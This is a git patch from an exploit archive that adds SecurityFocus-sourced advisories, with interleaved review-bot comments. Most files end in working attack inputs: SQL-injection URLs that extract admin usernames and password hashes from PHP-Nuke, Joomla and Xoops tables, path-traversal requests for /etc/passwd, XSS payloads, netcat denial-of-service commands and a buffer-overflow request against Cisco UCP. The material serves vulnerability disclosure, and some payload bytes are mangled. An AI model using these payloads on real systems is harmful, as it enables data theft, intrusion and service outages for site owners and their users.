From daf63a14a4cecb73450f4708c844926fcbf7e297 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 5 Feb 2014 04:27:32 +0000 Subject: [PATCH] Updated 02_05_2014 --- files.csv | 18 ++++++++++++++++++ platforms/linux/remote/31396.txt | 9 +++++++++ platforms/multiple/dos/31376.txt | 15 +++++++++++++++ platforms/multiple/dos/31378.txt | 10 ++++++++++ platforms/php/webapps/31377.txt | 8 ++++++++ platforms/php/webapps/31379.txt | 9 +++++++++ platforms/php/webapps/31380.txt | 9 +++++++++ platforms/php/webapps/31382.txt | 7 +++++++ platforms/php/webapps/31383.txt | 9 +++++++++ platforms/php/webapps/31384.txt | 7 +++++++ platforms/php/webapps/31387.txt | 10 ++++++++++ platforms/php/webapps/31388.txt | 10 ++++++++++ platforms/php/webapps/31389.txt | 9 +++++++++ platforms/php/webapps/31390.txt | 9 +++++++++ platforms/php/webapps/31391.txt | 9 +++++++++ platforms/php/webapps/31392.txt | 9 +++++++++ platforms/php/webapps/31393.txt | 10 ++++++++++ platforms/windows/dos/31394.txt | 11 +++++++++++ platforms/windows/remote/31395.txt | 11 +++++++++++ 19 files changed, 189 insertions(+) create mode 100755 platforms/linux/remote/31396.txt create mode 100755 platforms/multiple/dos/31376.txt create mode 100755 platforms/multiple/dos/31378.txt create mode 100755 platforms/php/webapps/31377.txt create mode 100755 platforms/php/webapps/31379.txt create mode 100755 platforms/php/webapps/31380.txt create mode 100755 platforms/php/webapps/31382.txt create mode 100755 platforms/php/webapps/31383.txt create mode 100755 platforms/php/webapps/31384.txt create mode 100755 platforms/php/webapps/31387.txt create mode 100755 platforms/php/webapps/31388.txt create mode 100755 platforms/php/webapps/31389.txt create mode 100755 platforms/php/webapps/31390.txt create mode 100755 platforms/php/webapps/31391.txt create mode 100755 platforms/php/webapps/31392.txt create mode 100755 platforms/php/webapps/31393.txt create mode 100755 platforms/windows/dos/31394.txt create mode 100755 platforms/windows/remote/31395.txt 
diff --git a/files.csv b/files.csv
index d6b6aec14..75b123f37 100755
--- a/files.csv
+++ b/files.csv
@@ -28173,3 +28173,21 @@ id,file,description,date,author,platform,type,port
 31373,platforms/php/webapps/31373.txt,"EasyImageCatalogue 1.31 describe.php d Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
 31374,platforms/php/webapps/31374.txt,"EasyImageCatalogue 1.31 addcomment.php d Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
 31375,platforms/php/webapps/31375.txt,"Drake CMS 0.4.11 RC8 'd_root' Parameter Local File Include Vulnerability",2008-03-10,THE_MILLER,php,webapps,0
+31376,platforms/multiple/dos/31376.txt,"Acronis True Image Echo Enterprise Server 9.5.0.8072 Multiple Remote Denial of Service Vulnerabilities",2008-03-10,"Luigi Auriemma",multiple,dos,0
+31377,platforms/php/webapps/31377.txt,"PHP-Nuke Hadith Module 'cat' Parameter SQL Injection Vulnerability",2008-03-10,Lovebug,php,webapps,0
+31378,platforms/multiple/dos/31378.txt,"RemotelyAnywhere 8.0.668 'Accept-Charset' Parameter NULL Pointer Denial Of Service Vulnerability",2008-03-10,"Luigi Auriemma",multiple,dos,0
+31379,platforms/php/webapps/31379.txt,"EncapsGallery 1.11.2 watermark.php file Parameter XSS",2008-03-10,ZoRLu,php,webapps,0
+31380,platforms/php/webapps/31380.txt,"EncapsGallery 1.11.2 catalog_watermark.php file Parameter XSS",2008-03-10,ZoRLu,php,webapps,0
+31382,platforms/php/webapps/31382.txt,"Joomla! and Mambo 'ensenanzas' Component 'id' Parameter SQL Injection Vulnerability",2008-03-11,The-0utl4w,php,webapps,0
+31383,platforms/php/webapps/31383.txt,"PHP-Nuke NukeC30 3.0 Module 'id_catg' Parameter SQL Injection Vulnerability",2008-03-11,Houssamix,php,webapps,0
+31384,platforms/php/webapps/31384.txt,"PHP-Nuke zClassifieds Module 'cat' Parameter SQL Injection Vulnerability",2008-03-11,Lovebug,php,webapps,0
+31387,platforms/php/webapps/31387.txt,"Uberghey CMS 0.3.1 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0
+31388,platforms/php/webapps/31388.txt,"Travelsized CMS 0.4.1 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0
+31389,platforms/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 login Action Multiple Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
+31390,platforms/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 browse Action category Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
+31391,platforms/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 search_results Action search Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
+31392,platforms/php/webapps/31392.txt,"MAXdev My eGallery Module 3.04 For Xoops 'gid' Parameter SQL Injection Vulnerability",2008-03-12,S@BUN,php,webapps,0
+31393,platforms/php/webapps/31393.txt,"Jeebles Directory 2.9.60 Multiple Cross Site Scripting Vulnerabilities",2008-03-12,ZoRLu,php,webapps,0
+31394,platforms/windows/dos/31394.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 'CSuserCGI.exe' Multiple Remote Vulnerabilities",2008-03-12,felix,windows,dos,0
+31395,platforms/windows/remote/31395.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 CSUserCGI.exe Help Facility XSS",2008-03-12,felix,windows,remote,0
+31396,platforms/linux/remote/31396.txt,"Lighttpd 1.4.x mod_userdir Information Disclosure Vulnerability",2008-03-12,julien.cayzac,linux,remote,0
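Review bot: The new row 31378 gives the RemotelyAnywhere version as `8.0.668`, while the advisory added in platforms/multiple/dos/31378.txt says `8.0.688`; one of the two is a typo and should be reconciled against the referenced BID so that version-based searches of the index match the advisory. Rows 31394 and 31395 also spell the same binary two ways (`'CSuserCGI.exe'` and `CSUserCGI.exe`), which splits exact-match lookups. The ids 31381, 31385 and 31386 are absent from the added range; that may be intentional, but it is worth confirming that no rows were dropped.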
diff --git a/platforms/linux/remote/31396.txt b/platforms/linux/remote/31396.txt
new file mode 100755
index 000000000..c12192ae5
--- /dev/null
+++ b/platforms/linux/remote/31396.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28226/info
+
+The 'lighttpd' program is prone to a vulnerability that may allow attackers to access sensitive information because the application fails to properly handle exceptional conditions.
+
+Information obtained may aid in further attacks.
+
+This issue affects lighttpd 1.4.18; other versions may also be vulnerable.
+
+http://www.example.com/~nobody/etc/passwd
\ No newline at end of file
diff --git a/platforms/multiple/dos/31376.txt b/platforms/multiple/dos/31376.txt
new file mode 100755
index 000000000..d48a90cd1
--- /dev/null
+++ b/platforms/multiple/dos/31376.txt
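Review bot: The advisory body in 31396.txt never names the affected module, although the index row added in files.csv attributes the issue to mod_userdir, so a reader of this file alone cannot tell which configurations are exposed. I would add a line such as `Affects installations with mod_userdir enabled; check server.modules and set userdir.path explicitly.` The sample request suggests that an account's home directory is served when no per-user path is configured, but that is inferred from the URL rather than stated in the text. Operators can also narrow the module with `userdir.exclude-user` or `userdir.include-user` until an upgrade is in place.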
@@ -0,0 +1,15 @@ +source: http://www.securityfocus.com/bid/28169/info + +Acronis True Image Echo Enterprise Server is prone to multiple remote denial-of-service vulnerabilities. + +An attacker can exploit these issues to crash the affected application, denying service to legitimate users. + +????????ÿÿÿÿÿÿÿ + +nc SERVER 9877 -v -v -u -p 9876 < acrogroup.txt + +ÿÿ?ÿÿÿÿÿÿÿÿ)?ÿÿ*???ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ + +nc SERVER 9876 -v -v < acroagent.txt + + diff --git a/platforms/multiple/dos/31378.txt b/platforms/multiple/dos/31378.txt new file mode 100755 index 000000000..4fb0abbad --- /dev/null +++ b/platforms/multiple/dos/31378.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/28175/info + +RemotelyAnywhere is prone to a remote denial-of-service vulnerability because it fails to adequately sanitize user-supplied input. + +Exploiting this issue will cause the server to copy data to a NULL pointer, which will crash the server, denying access to legitimate users. + +This issue affects RemotelyAnywhere Server and Workstation 8.0.688; other versions may also be affected. + +GET / HTTP/1.1 +Accept-Charset: boom \ No newline at end of file diff --git a/platforms/php/webapps/31377.txt b/platforms/php/webapps/31377.txt new file mode 100755 index 000000000..27a5110d6 --- /dev/null +++ b/platforms/php/webapps/31377.txt 
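Review bot: The two payload lines in 31376.txt contain `?` substitution characters and long `ÿ` runs, which suggests raw bytes were stored through a lossy text encoding, so the file should not be treated as a faithful record of the original packets, for example when deriving a network signature. The text also omits the affected version that the index row carries (9.5.0.8072) and does not say which services sit behind the two ports in the `nc` lines (9876 over TCP and 9877 over UDP, going by the `-u` flag). I would add a short scoping line so defenders can check exposure, e.g. `Affects True Image Echo Enterprise Server 9.5.0.8072; services on TCP 9876 and UDP 9877.`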
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/28171/info
+
+The Hadith module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/modules.php?modules.php?modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Caid%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
+http://www.example.com/modules.php?modules.php?modload&name=Hadith&file=index&action=viewcat&cat=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A
\ No newline at end of file
diff --git a/platforms/php/webapps/31379.txt b/platforms/php/webapps/31379.txt
new file mode 100755
index 000000000..d1c437721
--- /dev/null
+++ b/platforms/php/webapps/31379.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28178/info
+
+EncapsGallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+EncapsGallery 1.11.2 is vulnerable to these issues; other versions may also be affected.
+
+http://localhost/encapsgallery-1.11.2/core/watermark.php?file=">
\ No newline at end of file
diff --git a/platforms/php/webapps/31380.txt b/platforms/php/webapps/31380.txt
new file mode 100755
index 000000000..3d5d2296d
--- /dev/null
+++ b/platforms/php/webapps/31380.txt
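Review bot: 31377.txt states neither an affected version nor a remediation; the version is likewise missing from 31382.txt and 31384.txt, and none of the SQL-injection entries in this commit (those three plus 31383.txt and 31392.txt) says how to fix the flaw. In every sample URL the injected parameter (`cat`, `id`, `id_catg`, `gid`) stands where a numeric identifier is expected, so a one-line note would cover all five: `Mitigation: cast the parameter to an integer or bind it in a prepared statement before it reaches the query.` For detection, the samples share a `union` / `select` sequence separated by `/**/` (URL-encoded as `%2F%2A%2A%2F` in this file) in the query string, which can be matched in web-server access logs.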
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28178/info
+
+EncapsGallery is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+EncapsGallery 1.11.2 is vulnerable to these issues; other versions may also be affected.
+
+http://localhost/encapsgallery-1.11.2/core/catalog_watermark.php?file=">
\ No newline at end of file
diff --git a/platforms/php/webapps/31382.txt b/platforms/php/webapps/31382.txt
new file mode 100755
index 000000000..8afc87907
--- /dev/null
+++ b/platforms/php/webapps/31382.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28196/info
+
+The 'ensenanzas' component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_ensenanzas&Itemid=71&id=99999/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*
\ No newline at end of file
diff --git a/platforms/php/webapps/31383.txt b/platforms/php/webapps/31383.txt
new file mode 100755
index 000000000..286d7203f
--- /dev/null
+++ b/platforms/php/webapps/31383.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28197/info
+
+The NukeC30 module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The NukeC30 module 3.0 is affected; other versions may also be vulnerable.
+
+http://www.example.com/modules.php?name=NukeC30&op=ViewCatg&id_catg=-1/**/union/**/select/**/concat(aid,0x3a,pwd),2/**/from/**/nuke_authors/*where%20admin%20-2
\ No newline at end of file
diff --git a/platforms/php/webapps/31384.txt b/platforms/php/webapps/31384.txt
new file mode 100755
index 000000000..c84de10bd
--- /dev/null
+++ b/platforms/php/webapps/31384.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28211/info
+
+The zClassifieds module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/modules.php?ZClassifieds&cat=-9999999/**/union/**/select/**/pwd,aid/**/from/**/nuke_authors/*where%20admin1/**
\ No newline at end of file
diff --git a/platforms/php/webapps/31387.txt b/platforms/php/webapps/31387.txt
new file mode 100755
index 000000000..2a57cace8
--- /dev/null
+++ b/platforms/php/webapps/31387.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28217/info
+
+Uberghey CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Exploiting these issues may allow an attacker to access potentially sensitive information and execute arbitrary local scripts in the context of the affected application.
+
+Uberghey CMS 0.3.1 is vulnerable; other versions may also be affected.
+
+http://www.example.com/uberghey-0.3.1/index.php?page_id=../../../../../../../../../../etc/passwd%00
+http://www.example.com/uberghey-0.3.1/index.php?language=../../../../../../../../../../etc/passwd%00
\ No newline at end of file
diff --git a/platforms/php/webapps/31388.txt b/platforms/php/webapps/31388.txt
new file mode 100755
index 000000000..c7857a934
--- /dev/null
+++ b/platforms/php/webapps/31388.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28218/info
+
+Travelsized CMS is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
+
+Exploiting these issues may allow an attacker to access potentially sensitive information in the context of the affected application.
+
+Travelsized CMS 0.4.1 is vulnerale; other versions may also be affected.
+
+http://www.example.com/travelsized-0.4.1/index.php?page_id=../../../../../../../../../../etc/passwd%00
+http://www.example.com/travelsized-0.4.1/index.php?language=../../../../../../../../../../etc/passwd%00
\ No newline at end of file
diff --git a/platforms/php/webapps/31389.txt b/platforms/php/webapps/31389.txt
new file mode 100755
index 000000000..5fe5f4706
--- /dev/null
+++ b/platforms/php/webapps/31389.txt
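Review bot: Both sample URLs in 31387.txt end in `%00`, and the advisory does not say that this relies on null-byte truncation of the included path; PHP rejects null bytes in filesystem paths from 5.3.4 on, so that part may not apply on newer runtimes even though the unvalidated `page_id` and `language` parameters remain a defect. The same applies to 31388.txt, whose version line also has the typo `vulnerale`. I would add `Mitigation: map page_id and language to an allow-list of known values instead of using them in a file path.` to both files.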
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28219/info
+
+Download Center is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+These issues affect Download Center 1.2; other versions may also be vulnerable.
+
+http://www.example.com/downloadcenter/?nav=login&message=">
\ No newline at end of file
diff --git a/platforms/php/webapps/31390.txt b/platforms/php/webapps/31390.txt
new file mode 100755
index 000000000..14961459b
--- /dev/null
+++ b/platforms/php/webapps/31390.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28219/info
+
+Download Center is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+These issues affect Download Center 1.2; other versions may also be vulnerable.
+
+http://www.example.com/downloadcenter/?nav=browse&category=">
\ No newline at end of file
diff --git a/platforms/php/webapps/31391.txt b/platforms/php/webapps/31391.txt
new file mode 100755
index 000000000..9e7252c4e
--- /dev/null
+++ b/platforms/php/webapps/31391.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28219/info
+
+Download Center is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+These issues affect Download Center 1.2; other versions may also be vulnerable.
+
+http://www.example.com/downloadcenter/?nav=search_results&search=">
\ No newline at end of file
diff --git a/platforms/php/webapps/31392.txt b/platforms/php/webapps/31392.txt
new file mode 100755
index 000000000..c1bd535cc
--- /dev/null
+++ b/platforms/php/webapps/31392.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28220/info
+
+MAXdev My eGallery module for Xoops is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+My eGallery 3.04 is vulnerable; other versions may also be affected.
+
+http://www.example.com/modules/my_egallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from+xoops_users/*
\ No newline at end of file
diff --git a/platforms/php/webapps/31393.txt b/platforms/php/webapps/31393.txt
new file mode 100755
index 000000000..ecc4b5ebe
--- /dev/null
+++ b/platforms/php/webapps/31393.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28221/info
+
+Jeebles Directory is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/Jeebles_Directory/?path=">
+http://www.example.com/Jeebles_Directory/?path=subdirectory/">
+http://www.example.com/Jeebles_Directory/subdirectory/index.php?path=">
+http://www.example.com/Jeebles_Directory/index.php?administration&access_login=-1&access_password=Notice:%20%20Undefined%20index:%20%20access_password%20in%20c:\program%20files\easyphp1-8\www\jeebles_directory\describe.php%20on%20line%2062&path=Notice:%20%20Use%20of%20undefined%20constant%20path%20-%20assumed%20'path'%20in%20c:\program%20files\easyphp1-8\www\jeebles_directory\describe.php%20on%20line%2062Notice:%20%20Undefined%20index:%20%20path%20in%20">%20on%20line%2062
\ No newline at end of file
diff --git a/platforms/windows/dos/31394.txt b/platforms/windows/dos/31394.txt
new file mode 100755
index 000000000..5dd71f6b4
--- /dev/null
+++ b/platforms/windows/dos/31394.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28222/info
+
+Cisco User-Changeable Password (UCP) is prone to multiple remote vulnerabilities, including cross-site scripting and buffer-overflow vulnerabilities.
+
+Exploiting the cross-site scripting issues may help the attacker steal cookie-based authentication credentials and launch other attacks. Exploiting the buffer-overflow vulnerabilities allows attackers to execute code in the context of the affected application, facilitating the remote compromise of affected computers.
+
+The buffer-overflow issues are tracked by Cisco Bug ID CSCsl49180. The cross-site scripting issues are tracked by Cisco Bug ID CSCsl49205.
+
+These issues affect versions prior to UCP 4.2 when running on Microsoft Windows.
+
+http://www.example.com/securecgi-bin/CSUserCGI.exe?Logout+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB.xyzab.c.hacker.
\ No newline at end of file
diff --git a/platforms/windows/remote/31395.txt b/platforms/windows/remote/31395.txt
new file mode 100755
index 000000000..c5a00496c
--- /dev/null
+++ b/platforms/windows/remote/31395.txt
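Review bot: 31394.txt is filed under `platforms/windows/dos/` and typed `dos` in files.csv, yet its own text says the buffer overflows allow code execution, so the classification understates the impact the advisory describes. 31394.txt and 31395.txt also carry identical descriptions covering both issue classes, so neither file says which Cisco Bug ID its sample request corresponds to. I would add one line to each, e.g. `This entry covers the buffer-overflow issue (CSCsl49180).` in 31394.txt and `This entry covers the cross-site scripting issue (CSCsl49205).` in 31395.txt; that mapping is inferred from the index titles and the request shapes, so confirm it before merging. The index version `3.3.4.12.5` appears in neither text file, which only says versions prior to UCP 4.2 are affected.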
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28222/info
+
+Cisco User-Changeable Password (UCP) is prone to multiple remote vulnerabilities, including cross-site scripting and buffer-overflow vulnerabilities.
+
+Exploiting the cross-site scripting issues may help the attacker steal cookie-based authentication credentials and launch other attacks. Exploiting the buffer-overflow vulnerabilities allows attackers to execute code in the context of the affected application, facilitating the remote compromise of affected computers.
+
